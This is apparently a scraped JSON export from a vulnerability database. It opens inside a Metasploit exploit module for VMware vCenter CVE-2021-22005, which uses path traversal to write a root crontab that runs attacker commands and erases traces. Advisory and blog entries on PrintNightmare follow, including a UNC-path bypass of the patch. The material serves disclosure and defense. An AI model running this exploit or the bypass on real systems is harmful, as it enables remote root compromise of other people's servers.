[REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'), \n'vars_get' => { \n'_c' => '' \n} \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body == '\"FULL\"' \nreturn CheckCode::Safe('CEIP is not fully enabled.') \nend \n \nCheckCode::Appears('CEIP is fully enabled.') \nend \n \ndef exploit \nprint_status('Creating path traversal') \n \nunless write_file(rand_text_alphanumeric(8..16)) \nfail_with(Failure::NotVulnerable, 'Failed to create path traversal') \nend \n \nprint_good('Successfully created path traversal') \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \nprint_warning(\"Please wait up to #{wfs_delay} seconds for a session\") \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Writing system crontab: #{crontab_path}\") \n \ncrontab_file = crontab(cmd) \nvprint_line(crontab_file) \n \nunless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file) \nfail_with(Failure::PayloadFailed, 'Failed to write system crontab') \nend \n \nprint_good('Successfully wrote system crontab') \nend \n \ndef write_file(path, data = nil) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'), \n'ctype' => 'application/json', \n'vars_get' => { \n'_c' => '', \n'_i' => \"/#{path}\" \n}, \n'data' => data \n) \n \nreturn false unless res&.code == 201 \n \ntrue \nend \n \ndef crontab(cmd) \n# https://man7.org/linux/man-pages/man5/crontab.5.html \n<<~CRONTAB.strip \n* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/ \n* * * * * root #{cmd} \nCRONTAB \nend \n \ndef crontab_path \n\"/etc/cron.d/#{crontab_name}.json\" \nend \n \ndef crontab_name \n@crontab_name ||= rand_text_alphanumeric(8..16) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt"}], "talosblog": [{"lastseen": "2021-08-13T00:41:37", "description": "By Edmund Brumaghin, Joe Marshall, and Arnaud Zobec. Executive Summary Another threat actor is actively exploiting the so-called PrintNightmare vulnerability (CVE-2021-1675 / CVE-2021-34527) in Windows' print spooler service to spread laterally across a victim's network as part of a recent... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T16:16:46", "type": "talosblog", "title": "Vice Society Leverages PrintNightmare In Ransomware Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-12T16:16:46", "id": "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DO1FBKPzvIs/vice-society-ransomware-printnightmare.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T22:35:10", "description": "Over the past several weeks, there's been a lot of discussion about a particular privilege escalation vulnerability in Windows affecting the print spooler, dubbed PrintNightmare. The vulnerability (CVE-2021-1675/CVE-2021-34527) has now been patched multiple times but is believed to still be... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-07-08T13:25:03", "type": "talosblog", "title": "PrintNightmare: Here\u2019s what you need to know and Talos\u2019 coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:25:03", "id": "TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/xyAn8M5kWIs/printnightmare-coverage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-07-08T18:09:13", "description": "_(Updated July 2, 2021) _For new information and mitigations, see [Microsoft's updated guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n_(Updated July 1, 2021) _See [Microsoft's new guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) and apply the necessary workarounds. \n\n_(Original post June 30, 2021)_ The CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for a critical remote code execution vulnerability in the Windows Print spooler service, noting: \u201cwhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675.\u201d An attacker can exploit this vulnerability\u2014nicknamed PrintNightmare\u2014to take control of an affected system.\n\nCISA encourages administrators to disable the Windows Print spooler service in Domain Controllers and systems that do not print. Additionally, administrators should employ the following best practice from Microsoft\u2019s [how-to guides](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>), published January 11, 2021: \u201cDue to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object.\u201d \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cisa", "title": "PrintNightmare, Critical Windows Print Spooler Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T00:00:00", "id": "CISA:367C27124C09604830E0725F5F3123F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T18:12:56", "description": "Microsoft has released [out-of-band security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to address a remote code execution (RCE) vulnerability\u2014known as PrintNightmare (CVE-2021-34527)\u2014in the Windows Print spooler service. According to the CERT Coordination Center (CERT/CC), \u201cThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\u201d\n\nThe updates are cumulative and contain all previous fixes as well as protections for CVE-2021-1675. The updates do not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016\u2014Microsoft states updates for these versions are forthcoming. Note: According to CERT/CC, \u201cthe Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant.\u201d See [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) for workarounds for the LPE variant.\n\nCISA encourages users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds. For additional background, see [CISA\u2019s initial Current Activity on PrintNightmare](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "CISA:6C836D217FB0329B2D68AD71789D1BB0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. See VMware\u2019s [workaround instructions for CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:32:30", "description": "CISA has issued [Emergency Directive (ED) 21-04: Mitigate Windows Print Spooler Service Vulnerability](<https://www.cisa.gov/emergency-directive-21-04>) addressing [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Attackers can exploit this vulnerability to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nSpecifically, ED 21-04 directs federal departments and agencies to immediately apply the [Microsoft July 2021 updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) and disable the print spooler service on servers on Microsoft Active Directory (AD) Domain Controllers (DCs).\n\nAlthough ED 21-04 applies to Executive Branch departments and agencies, CISA strongly recommends that state and local governments, private sector organizations, and others review [ED 21-04: Mitigate Windows Print Spooler Service Vulnerability](<https://www.cisa.gov/emergency-directive-21-04>) for additional mitigation recommendations.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "cisa", "title": "CISA Issues Emergency Directive on Microsoft Windows Print Spooler", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-01-25T00:00:00", "id": "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T11:35:47", "description": "CISA and the Federal Bureau of Investigation (FBI) have released a [joint Cybersecurity Advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>) that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. The actors then exploited a critical Windows Print Spooler vulnerability, \u201cPrintNightmare\u201d (CVE-2021-34527), to run arbitrary code with system privileges. The advisory provides observed tactics, techniques, and procedures, as well as indicators of compromise and mitigations to protect against this threat. \n\nCISA encourages users and administrators to review [AA22-074A: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>). For general information on Russian state-sponsored malicious cyber activity, see [cisa.gov/Russia](<https://www.cisa.gov/uscert/russia>). For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure, as well as additional mitigation recommendations, see [AA22-011A: Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure](<https://www.cisa.gov/uscert/ncas/alerts/aa22-011a>) and [cisa.gov/shields-up](<https://www.cisa.gov/shields-up>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-15T00:00:00", "type": "cisa", "title": "Russian State-Sponsored Cyber Actors Access Network Misconfigured with Default MFA Protocols", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-15T00:00:00", "id": "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-10-18T16:33:50", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**kevthehermit** at June 30, 2021 1:53pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**andretorresbr** at July 02, 2021 2:37am UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**architect00** at July 01, 2021 1:46pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**NinjaOperator** at June 29, 2021 5:55pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**ccondon-r7** at July 01, 2021 1:43pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-1675", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-10-07T00:00:00", "id": "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "href": "https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:38:40", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**zeroSteiner** at July 08, 2021 5:09pm UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\n**ccondon-r7** at July 08, 2021 12:12am UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "attackerkb", "title": "CVE-2021-34527 \"PrintNightmare\"", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 